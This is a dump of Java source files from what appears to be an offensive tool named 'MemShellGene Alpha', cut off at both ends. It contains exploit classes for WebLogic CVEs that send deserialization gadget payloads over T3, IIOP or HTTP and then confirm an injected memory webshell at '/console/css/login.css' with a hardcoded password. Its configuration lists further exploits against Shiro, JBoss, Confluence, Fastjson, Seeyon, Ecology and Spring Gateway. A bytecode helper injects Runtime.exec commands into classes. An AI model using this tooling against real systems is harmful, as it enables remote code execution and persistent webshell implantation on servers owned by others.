Util.messageQueue.add("---------------------------\n"); 43 | }else { 44 | Util.messageQueue.add("注入失败"); 45 | } 46 | 47 | }catch (Exception e){ 48 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 49 | } 50 | } 51 | 52 | @Override 53 | public void run(HashMap params) { 54 | String target = params.get("target"); 55 | 56 | String payloadType = params.get("payloadType"); 57 | String gadgetType = params.get("gadgetType"); 58 | String trojanType = params.get("trojanType"); 59 | String protocol = params.get("protocol"); 60 | String stripUrl = this.getStripUrl(target); 61 | this.attack(protocol, stripUrl, gadgetType, payloadType, trojanType); 62 | 63 | } 64 | 65 | } 66 | -------------------------------------------------------------------------------- /src/main/java/exp/weblogic/Weblogic_CVE_2020_14756.java: -------------------------------------------------------------------------------- 1 | package exp.weblogic; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | import utils.weblogic.IIOPProtocolOperation; 9 | import utils.weblogic.T3ProtocolOperation; 10 | 11 | import java.lang.reflect.InvocationTargetException; 12 | import java.util.HashMap; 13 | 14 | public class Weblogic_CVE_2020_14756 extends BaseExp implements AttackBase { 15 | public void attack(String protocol, String stripUrl, String gadgetType, String payloadType, String trojanType) { 16 | Object payload = null; 17 | String[] ipAndPort = Util.getIPAndPortFromBase(stripUrl); 18 | String host = ipAndPort[0]; 19 | String port = ipAndPort[1]; 20 | try { 21 | try { 22 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 23 | if (protocol.equalsIgnoreCase("t3")) { 24 | //T3 send 25 | T3ProtocolOperation.send(protocol, host, port, Util.serialize(payload)); 26 | } else if (protocol.equalsIgnoreCase("iiop")) { 27 | IIOPProtocolOperation.send(host,port, payload); 28 | } 29 | }catch (Exception e){} 30 | HashMap header = new HashMap(); 31 | String mime = "application/x-www-form-urlencoded"; 32 | header.put("X-Requested-With", "XmlHTTPRequest"); 33 | Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header); 34 | String bodyResult = response.body().string(); 35 | response.close(); 36 | if (bodyResult.contains("Success")) { 37 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css")); 38 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 39 | Util.messageQueue.add(String.format("Key: key\n")); 40 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 41 | Util.messageQueue.add("---------------------------\n"); 42 | }else { 43 | Util.messageQueue.add("注入失败"); 44 | } 45 | 46 | }catch (Exception e){ 47 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 48 | } 49 | } 50 | 51 | @Override 52 | public void run(HashMap params) { 53 | String target = params.get("target"); 54 | 55 | String payloadType = params.get("payloadType"); 56 | String gadgetType = params.get("gadgetType"); 57 | String trojanType = params.get("trojanType"); 58 | String protocol = params.get("protocol"); 59 | String stripUrl = this.getStripUrl(target); 60 | this.attack(protocol, stripUrl, gadgetType, payloadType, trojanType); 61 | 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /src/main/java/exp/weblogic/Weblogic_CVE_2020_14883.java: -------------------------------------------------------------------------------- 1 | package exp.weblogic; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | import utils.okhttplib.OkHttp; 9 | 10 | import java.lang.reflect.InvocationTargetException; 11 | import java.util.HashMap; 12 | 13 | public class Weblogic_CVE_2020_14883 extends BaseExp implements AttackBase { 14 | 15 | public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 16 | Object payload = null; 17 | try { 18 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 19 | HashMap header = new HashMap(); 20 | header.put("Cache-Control", "max-age=0"); 21 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 22 | header.put("Accept-Encoding", "gzip, deflate"); 23 | header.put("Accept-Language", "zh-CN,zh;q=0.9"); 24 | String mime = "application/x-www-form-urlencoded; charset=utf-8"; 25 | this.launch(stripUrl, payload.toString(), mime, header); 26 | Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header); 27 | String bodyResult = response.body().string(); 28 | response.close(); 29 | if (bodyResult.contains("Success")) { 30 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css")); 31 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 32 | Util.messageQueue.add(String.format("Key: key\n")); 33 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 34 | Util.messageQueue.add("---------------------------\n"); 35 | }else { 36 | Util.messageQueue.add("注入失败"); 37 | } 38 | 39 | }catch (Exception e){ 40 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 41 | } 42 | } 43 | 44 | @Override 45 | public void run(HashMap params) { 46 | String target = params.get("target"); 47 | String payloadType = params.get("payloadType"); 48 | String gadgetType = params.get("gadgetType"); 49 | String trojanType = params.get("trojanType"); 50 | String stripUrl = this.getStripUrl(target); 51 | this.attack(stripUrl, gadgetType, payloadType, trojanType); 52 | 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /src/main/java/exp/weblogic/Weblogic_CVE_2020_2883.java: -------------------------------------------------------------------------------- 1 | package exp.weblogic; 2 | 3 | 4 | import core.GeneratePayload; 5 | import exp.AttackBase; 6 | import exp.BaseExp; 7 | import okhttp3.Response; 8 | import utils.Util; 9 | import utils.weblogic.IIOPProtocolOperation; 10 | import utils.weblogic.T3ProtocolOperation; 11 | 12 | import java.lang.reflect.InvocationTargetException; 13 | import java.util.HashMap; 14 | 15 | public class Weblogic_CVE_2020_2883 extends BaseExp implements AttackBase { 16 | public void attack(String protocol, String stripUrl, String gadgetType, String payloadType, String trojanType) { 17 | Object payload = null; 18 | String[] ipAndPort = Util.getIPAndPortFromBase(stripUrl); 19 | String host = ipAndPort[0]; 20 | String port = ipAndPort[1]; 21 | try { 22 | try { 23 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 24 | if (protocol.equalsIgnoreCase("t3")) { 25 | //T3 send 26 | T3ProtocolOperation.send(protocol, host, port, Util.serialize(payload)); 27 | } else if (protocol.equalsIgnoreCase("iiop")) { 28 | IIOPProtocolOperation.send(host,port, payload); 29 | } 30 | }catch (Exception e){} 31 | 32 | HashMap header = new HashMap(); 33 | String mime = "application/x-www-form-urlencoded"; 34 | header.put("X-Requested-With", "XmlHTTPRequest"); 35 | Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header); 36 | String bodyResult = response.body().string(); 37 | response.close(); 38 | if (bodyResult.contains("Success")) { 39 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css")); 40 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 41 | Util.messageQueue.add(String.format("Key: key\n")); 42 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 43 | Util.messageQueue.add("---------------------------\n"); 44 | }else { 45 | Util.messageQueue.add("注入失败"); 46 | } 47 | 48 | }catch (Exception e){ 49 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 50 | } 51 | } 52 | 53 | @Override 54 | public void run(HashMap params) { 55 | String target = params.get("target"); 56 | 57 | String payloadType = params.get("payloadType"); 58 | String gadgetType = params.get("gadgetType"); 59 | String trojanType = params.get("trojanType"); 60 | String protocol = params.get("protocol"); 61 | String stripUrl = this.getStripUrl(target); 62 | this.attack(protocol, stripUrl, gadgetType, payloadType, trojanType); 63 | 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /src/main/java/ui/ComponentType.java: -------------------------------------------------------------------------------- 1 | package ui; 2 | 3 | public enum ComponentType { 4 | Shiro, 5 | Fastjson, 6 | JBoss, 7 | Weblogic, 8 | Confluence, 9 | Ecology, 10 | Seeyon, 11 | SpringGateWay, 12 | TongWeb 13 | 14 | 15 | } 16 | -------------------------------------------------------------------------------- /src/main/java/ui/Config.java: -------------------------------------------------------------------------------- 1 | package ui; 2 | 3 | import java.util.Arrays; 4 | import java.util.HashMap; 5 | import java.util.List; 6 | 7 | public class Config { 8 | 9 | public static List supportModules = Arrays.asList( 10 | "Shiro", 11 | "Weblogic", 12 | "Fastjson", 13 | "JBoss", 14 | "Confluence", 15 | "ECology", 16 | "Seeyon", 17 | "SpringGateWay" 18 | ); 19 | 20 | public static List serverNameList = Arrays.asList( 21 | "Tomcat", 22 | "TongWeb", 23 | "Weblogic", 24 | "Spring", 25 | "Netty", 26 | "JBoss", 27 | "Jetty", 28 | "Resin", 29 | "GlassFish", 30 | "WebSphere"); 31 | 32 | public static HashMap> moduleExps = new HashMap>(); 33 | 34 | static{ 35 | moduleExps.put("Shiro", Arrays.asList("550")); 36 | moduleExps.put("Weblogic", Arrays.asList("CVE_2020_14756", "CVE_2020_2883", "0Day_1", "CVE_2020_14883")); 37 | moduleExps.put("Fastjson", Arrays.asList("AutoType_ByPass")); 38 | moduleExps.put("JBoss", Arrays.asList("CVE_2017_12149", "CVE_2017_7504")); 39 | moduleExps.put("Confluence", Arrays.asList("CVE_2022_26134", "CVE_2021_26084")); 40 | moduleExps.put("ECology", Arrays.asList("BeanShell_RCE")); 41 | moduleExps.put("Seeyon", Arrays.asList("Unauthorized_RCE")); 42 | moduleExps.put("SpringGateWay", Arrays.asList("CVE_2022_22947")); 43 | 44 | } 45 | 46 | public static HashMap> moduleServers = new HashMap>(); 47 | 48 | static{ 49 | moduleServers.put("Shiro", serverNameList); 50 | moduleServers.put("Weblogic", Arrays.asList("Weblogic")); 51 | // moduleServers.put("Fastjson", serverNameList); 52 | moduleServers.put("Fastjson", Arrays.asList("Tomcat")); 53 | moduleServers.put("JBoss", Arrays.asList("JBoss")); 54 | moduleServers.put("Confluence", Arrays.asList("Tomcat")); 55 | moduleServers.put("ECology", Arrays.asList("Resin")); 56 | moduleServers.put("Seeyon", Arrays.asList("Tomcat")); 57 | moduleServers.put("SpringGateWay", Arrays.asList("Spring", "Netty")); 58 | 59 | } 60 | 61 | 62 | 63 | 64 | 65 | public static HashMap> serverComponent = new HashMap>(); 66 | static { 67 | serverComponent.put("Spring", Arrays.asList("Boot", "Controller", "Interceptor", "WebfluxHandler")); 68 | serverComponent.put("Tomcat", Arrays.asList("Filter", "Listener")); 69 | serverComponent.put("TongWeb", Arrays.asList("Filter", "Listener")); 70 | serverComponent.put("WebSphere", Arrays.asList("Filter")); 71 | serverComponent.put("Netty", Arrays.asList("Handler")); 72 | 73 | } 74 | 75 | public static List CommonsGadget = Arrays.asList( 76 | "All", 77 | "CommonsBeanutils1", 78 | "CommonsBeanutils1_183", 79 | "CommonsBeanutilsAttrCompare", 80 | "CommonsBeanutilsAttrCompare_183", 81 | "CommonsBeanutilsObjectToStringComparator", 82 | "CommonsBeanutilsObjectToStringComparator_183", 83 | "CommonsBeanutilsPropertySource", 84 | "CommonsBeanutilsPropertySource_183", 85 | "CommonsBeanutilsString", 86 | "CommonsBeanutilsString_183", 87 | "CommonsBeanutilsString_192s", 88 | "CommonsCollections5", 89 | "CommonsCollections6", 90 | "CommonsCollectionsK1", 91 | "CommonsCollectionsK2", 92 | "Jdk7u21", 93 | "Spring1", 94 | "C3P0" 95 | ); 96 | 97 | public static HashMap> gadGetMap = new HashMap>(); 98 | static { 99 | gadGetMap.put("Shiro_550", CommonsGadget); 100 | gadGetMap.put("JBoss_CVE_2017_12149", CommonsGadget); 101 | gadGetMap.put("JBoss_CVE_2017_7504", CommonsGadget); 102 | // gadGetMap.put("Weblogic_CVE_2016_3510", CommonsGadget); 103 | gadGetMap.put("Weblogic_CVE_2020_14756", Arrays.asList("Weblogic_CVE_2020_14756")); 104 | gadGetMap.put("Weblogic_0Day_1", Arrays.asList("Weblogic_0Day_JDK7")); 105 | gadGetMap.put("Weblogic_CVE_2020_2883", Arrays.asList("Weblogic_CVE_2020_2883")); 106 | gadGetMap.put("Weblogic_CVE_2020_14883", Arrays.asList("Weblogic_CVE_2020_14883")); 107 | gadGetMap.put("Fastjson_AutoType_ByPass", Arrays.asList("Fastjson_AutoType_ByPass")); 108 | gadGetMap.put("Confluence_CVE_2021_26084", Arrays.asList("Confluence_CVE_2021_26084")); 109 | gadGetMap.put("Confluence_CVE_2022_26134", Arrays.asList("Confluence_CVE_2022_26134")); 110 | gadGetMap.put("ECology_BeanShell_RCE", Arrays.asList("ECology_BeanShell_RCE")); 111 | gadGetMap.put("Seeyon_Unauthorized_RCE", Arrays.asList("Seeyon_Unauthorized_RCE")); 112 | gadGetMap.put("SpringGateWay_CVE_2022_22947", Arrays.asList("SpringGateWay_CVE_2022_22947")); 113 | } 114 | 115 | public static HashMap> protocolMap = new HashMap>(); 116 | static { 117 | protocolMap.put("Shiro_550", Arrays.asList("http")); 118 | protocolMap.put("JBoss_CVE_2017_12149", Arrays.asList("http")); 119 | protocolMap.put("JBoss_CVE_2017_7504", Arrays.asList("http")); 120 | protocolMap.put("Weblogic_CVE_2020_14756",Arrays.asList("t3", "iiop")); 121 | // protocolMap.put("Weblogic_CVE_2020_14756",Arrays.asList("t3", "iiop", "t3s")); 122 | protocolMap.put("Weblogic_0Day_1", Arrays.asList("t3", "iiop")); 123 | // protocolMap.put("Weblogic_0Day_1", Arrays.asList("t3", "iiop", "t3s")); 124 | protocolMap.put("Weblogic_CVE_2020_2883", Arrays.asList("t3", "iiop")); 125 | // protocolMap.put("Weblogic_CVE_2020_2883", Arrays.asList("t3", "iiop", "t3s")); 126 | protocolMap.put("Weblogic_CVE_2020_14883", Arrays.asList("http")); 127 | protocolMap.put("Fastjson_AutoType_ByPass", Arrays.asList("http")); 128 | protocolMap.put("Confluence_CVE_2021_26084", Arrays.asList("http")); 129 | protocolMap.put("Confluence_CVE_2022_26134", Arrays.asList("http")); 130 | protocolMap.put("ECology_BeanShell_RCE", Arrays.asList("http")); 131 | protocolMap.put("Seeyon_Unauthorized_RCE", Arrays.asList("http")); 132 | protocolMap.put("SpringGateWay_CVE_2022_22947", Arrays.asList("http")); 133 | } 134 | 135 | } 136 | -------------------------------------------------------------------------------- /src/main/java/ui/Main.java: -------------------------------------------------------------------------------- 1 | package ui; 2 | 3 | import javafx.application.Application; 4 | import javafx.fxml.FXMLLoader; 5 | import javafx.scene.Parent; 6 | import javafx.scene.Scene; 7 | import javafx.stage.Stage; 8 | import utils.SystemInfo; 9 | 10 | public class Main extends Application { 11 | 12 | @Override 13 | public void start(Stage primaryStage) throws Exception{ 14 | if (SystemInfo.isMacOS && System.getProperty("apple.laf.useScreenMenuBar") == null) 15 | System.setProperty("apple.laf.useScreenMenuBar", "true"); 16 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true"); 17 | Parent root = FXMLLoader.load(getClass().getResource("/sample.fxml")); 18 | primaryStage.setTitle("MemShellGene Alpha"); 19 | primaryStage.setResizable(false); 20 | primaryStage.setScene(new Scene(root, 1190, 600)); 21 | primaryStage.show(); 22 | 23 | } 24 | 25 | 26 | 27 | public static void main(String[] args) { 28 | launch(args); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/utils/MessagePrintBase.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | public class MessagePrintBase implements Runnable { 4 | 5 | public String readMessage() { 6 | return Util.messageQueue.poll(); 7 | } 8 | 9 | @Override 10 | public void run() { 11 | 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /src/main/java/utils/SystemInfo.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | import java.util.Locale; 4 | import java.util.StringTokenizer; 5 | 6 | public class SystemInfo { 7 | public static final boolean isWindows; 8 | 9 | public static final boolean isMacOS; 10 | 11 | public static final boolean isLinux; 12 | 13 | static { 14 | String osName = System.getProperty("os.name").toLowerCase(Locale.ENGLISH); 15 | isWindows = osName.startsWith("windows"); 16 | isMacOS = osName.startsWith("mac"); 17 | isLinux = osName.startsWith("linux"); 18 | } 19 | 20 | public static final long osVersion = scanVersion(System.getProperty("os.version")); 21 | 22 | public static final boolean isWindows_10_orLater = (isWindows && osVersion >= toVersion(10, 0, 0, 0)); 23 | 24 | public static final boolean isMacOS_10_11_ElCapitan_orLater = (isMacOS && osVersion >= toVersion(10, 11, 0, 0)); 25 | 26 | public static final boolean isMacOS_10_14_Mojave_orLater = (isMacOS && osVersion >= toVersion(10, 14, 0, 0)); 27 | 28 | public static final boolean isMacOS_10_15_Catalina_orLater = (isMacOS && osVersion >= toVersion(10, 15, 0, 0)); 29 | 30 | public static final long javaVersion = scanVersion(System.getProperty("java.version")); 31 | 32 | public static final boolean isJava_9_orLater = (javaVersion >= toVersion(9, 0, 0, 0)); 33 | 34 | public static final boolean isJava_11_orLater = (javaVersion >= toVersion(11, 0, 0, 0)); 35 | 36 | public static final boolean isJava_15_orLater = (javaVersion >= toVersion(15, 0, 0, 0)); 37 | 38 | public static final boolean isJetBrainsJVM = System.getProperty("java.vm.vendor", "Unknown") 39 | .toLowerCase(Locale.ENGLISH).contains("jetbrains"); 40 | 41 | public static final boolean isJetBrainsJVM_11_orLater = (isJetBrainsJVM && isJava_11_orLater); 42 | 43 | public static final boolean isKDE = (isLinux && System.getenv("KDE_FULL_SESSION") != null); 44 | 45 | public static long scanVersion(String version) { 46 | int major = 1; 47 | int minor = 0; 48 | int micro = 0; 49 | int patch = 0; 50 | try { 51 | StringTokenizer st = new StringTokenizer(version, "._-+"); 52 | major = Integer.parseInt(st.nextToken()); 53 | minor = Integer.parseInt(st.nextToken()); 54 | micro = Integer.parseInt(st.nextToken()); 55 | patch = Integer.parseInt(st.nextToken()); 56 | } catch (Exception exception) {} 57 | return toVersion(major, minor, micro, patch); 58 | } 59 | 60 | public static long toVersion(int major, int minor, int micro, int patch) { 61 | return (major << 48L) + (minor << 32L) + (micro << 16L) + patch; 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /src/main/java/utils/SystemPrintMessage.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | public class SystemPrintMessage extends MessagePrintBase{ 4 | 5 | public SystemPrintMessage(){} 6 | 7 | public void run(){ 8 | while (true){ 9 | String message = this.readMessage(); 10 | if (message != null) { 11 | System.out.println(message); 12 | } 13 | } 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/utils/TextAreaPrintMessage.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | 4 | import javafx.scene.control.TextArea; 5 | 6 | import java.io.UnsupportedEncodingException; 7 | 8 | public class TextAreaPrintMessage extends MessagePrintBase{ 9 | 10 | private TextArea jTextArea; 11 | 12 | public TextAreaPrintMessage(TextArea jTextArea){ 13 | this.jTextArea = jTextArea; 14 | } 15 | 16 | public void run(){ 17 | while (true){ 18 | String message = this.readMessage(); 19 | if (message != null) { 20 | try { 21 | this.jTextArea.appendText(new String(message.getBytes("UTF-8"), "utf-8")); 22 | } catch (UnsupportedEncodingException e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /src/main/java/utils/Transformers.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | import java.io.InputStream; 4 | import org.objectweb.asm.*; 5 | 6 | 7 | /** 8 | * @Classname Transformers 9 | * @Description Insert command to the template classfile 10 | * @Author Welkin 11 | */ 12 | public class Transformers { 13 | 14 | public static byte[] insertCommand(InputStream inputStream, String command) throws Exception{ 15 | 16 | ClassReader cr = new ClassReader(inputStream); 17 | ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES); 18 | ClassVisitor cv = new TransformClass(cw,command); 19 | 20 | cr.accept(cv, 2); 21 | return cw.toByteArray(); 22 | } 23 | 24 | static class TransformClass extends ClassVisitor{ 25 | 26 | String command; 27 | 28 | TransformClass(ClassVisitor classVisitor, String command){ 29 | super(Opcodes.ASM7,classVisitor); 30 | this.command = command; 31 | } 32 | 33 | @Override 34 | public MethodVisitor visitMethod( 35 | final int access, 36 | final String name, 37 | final String descriptor, 38 | final String signature, 39 | final String[] exceptions) { 40 | MethodVisitor mv = cv.visitMethod(access, name, descriptor, signature, exceptions); 41 | if(name.equals("")){ 42 | return new TransformMethod(mv,command); 43 | }else{ 44 | return mv; 45 | } 46 | } 47 | } 48 | 49 | static class TransformMethod extends MethodVisitor{ 50 | 51 | String command; 52 | 53 | TransformMethod(MethodVisitor methodVisitor,String command) { 54 | super(Opcodes.ASM7, methodVisitor); 55 | this.command = command; 56 | } 57 | 58 | @Override 59 | public void visitCode(){ 60 | 61 | Label label0 = new Label(); 62 | Label label1 = new Label(); 63 | Label label2 = new Label(); 64 | mv.visitTryCatchBlock(label0, label1, label2, "java/lang/Exception"); 65 | mv.visitLabel(label0); 66 | mv.visitLdcInsn(command); 67 | mv.visitVarInsn(Opcodes.ASTORE, 0); 68 | mv.visitMethodInsn(Opcodes.INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 69 | mv.visitVarInsn(Opcodes.ALOAD, 0); 70 | mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/Runtime", "exec", "(Ljava/lang/String;)Ljava/lang/Process;", false); 71 | mv.visitInsn(Opcodes.POP); 72 | mv.visitLabel(label1); 73 | Label label3 = new Label(); 74 | mv.visitJumpInsn(Opcodes.GOTO, label3); 75 | mv.visitLabel(label2); 76 | mv.visitVarInsn(Opcodes.ASTORE, 0); 77 | mv.visitVarInsn(Opcodes.ALOAD, 0); 78 | mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/Exception", "printStackTrace", "()V", false); 79 | mv.visitLabel(label3); 80 | } 81 | } 82 | 83 | } 84 | -------------------------------------------------------------------------------- /src/main/java/utils/UserAgentUtil.java: -------------------------------------------------------------------------------- 1 | package utils; 2 | 3 | import java.util.ArrayList; 4 | import java.util.List; 5 | import java.util.Random; 6 | 7 | public class UserAgentUtil { 8 | private static List list = new ArrayList(); 9 | 10 | static { 11 | list.add("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"); 12 | list.add("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"); 13 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"); 14 | list.add("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"); 15 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"); 16 | list.add("Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"); 17 | list.add("Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0"); 18 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"); 19 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"); 20 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"); 21 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"); 22 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)"); 23 | list.add("Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)"); 24 | list.add("Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"); 25 | list.add("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2"); 26 | list.add("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/525.28.3"); 27 | list.add("Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16"); 28 | list.add("Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"); 29 | list.add("Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14"); 30 | list.add("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14"); 31 | list.add("Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02"); 32 | list.add("Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"); 33 | list.add("Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00"); 34 | list.add("Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00"); 35 | list.add("Opera/12.0(Windows NT 5.1;U;en)Presto/22.9.168 Version/12.00"); 36 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"); 37 | list.add("Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"); 38 | list.add("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"); 39 | list.add("Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0"); 40 | list.add("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0"); 41 | list.add("Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"); 42 | } 43 | 44 | private static int getRandomIndex() { 45 | int max = 31; 46 | int min = 0; 47 | Random random = new Random(); 48 | return random.nextInt(max) % (max - min + 1) + min; 49 | } 50 | 51 | public static String getRandomUserAgent(){ 52 | return list.get(getRandomIndex()); 53 | } 54 | 55 | } -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/OkHttpProxyInterceptor.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import okhttp3.Interceptor; 4 | import okhttp3.Response; 5 | 6 | import java.io.IOException; 7 | 8 | 9 | public class OkHttpProxyInterceptor implements Interceptor 10 | { 11 | private ProxyConfig proxyConfig; 12 | private ThreadLocalProxyAuthenticator authenticator = ThreadLocalProxyAuthenticator.getInstance(); 13 | 14 | public OkHttpProxyInterceptor(ProxyConfig proxyConfig) 15 | { 16 | this.proxyConfig = proxyConfig; 17 | } 18 | 19 | @Override 20 | public Response intercept(Chain chain) throws IOException 21 | { 22 | boolean clearCredentials = false; 23 | if (proxyConfig != null) 24 | { 25 | if (proxyConfig.getAuthentication() != null) 26 | { 27 | authenticator.setCredentials(proxyConfig.getAuthentication()); 28 | clearCredentials = true; 29 | } 30 | } 31 | 32 | try 33 | { 34 | return chain.proceed(chain.request()); 35 | } 36 | finally 37 | { 38 | if (clearCredentials) 39 | { 40 | ThreadLocalProxyAuthenticator.clearCredentials(); 41 | } 42 | } 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ProxyConfig.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import java.net.InetSocketAddress; 4 | import java.net.PasswordAuthentication; 5 | import java.net.Proxy; 6 | 7 | 8 | public class ProxyConfig 9 | { 10 | private String proxyType = null; 11 | private String proxyHost = null; 12 | private int proxyPort = 0; 13 | private String userName = null; 14 | private String passWord = null; 15 | 16 | public ProxyConfig(String proxyType, String proxyHost, int proxyPort) 17 | { 18 | this.proxyType = proxyType; 19 | this.proxyHost = proxyHost; 20 | this.proxyPort = proxyPort; 21 | } 22 | 23 | public ProxyConfig(String proxyType, String proxyHost, int proxyPort, String userName, String passWord) 24 | { 25 | this.proxyType = proxyType; 26 | this.proxyHost = proxyHost; 27 | this.proxyPort = proxyPort; 28 | this.userName = userName; 29 | this.passWord = passWord; 30 | } 31 | 32 | public Proxy getProxy() 33 | { 34 | Proxy proxy = null; 35 | if (proxyType.equalsIgnoreCase("http")) 36 | { 37 | proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyHost, proxyPort)); 38 | } 39 | if (proxyType.equalsIgnoreCase("socks5") || proxyType.equalsIgnoreCase("socks4")) 40 | { 41 | proxy = new Proxy(Proxy.Type.SOCKS, new InetSocketAddress(proxyHost, proxyPort)); 42 | } 43 | 44 | return proxy; 45 | } 46 | 47 | public String getProxyType() 48 | { 49 | return proxyType; 50 | } 51 | 52 | public String getUserName() 53 | { 54 | return userName; 55 | } 56 | 57 | public String getPassWord() 58 | { 59 | return passWord; 60 | } 61 | 62 | public PasswordAuthentication getAuthentication() 63 | { 64 | if (userName != null && passWord != null) 65 | { 66 | return new PasswordAuthentication(userName, passWord.toCharArray()); 67 | } 68 | else 69 | { 70 | return null; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ProxySSLSocketFactory.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import javax.net.ssl.SSLSocketFactory; 4 | import java.io.IOException; 5 | import java.net.InetAddress; 6 | import java.net.InetSocketAddress; 7 | import java.net.Proxy; 8 | import 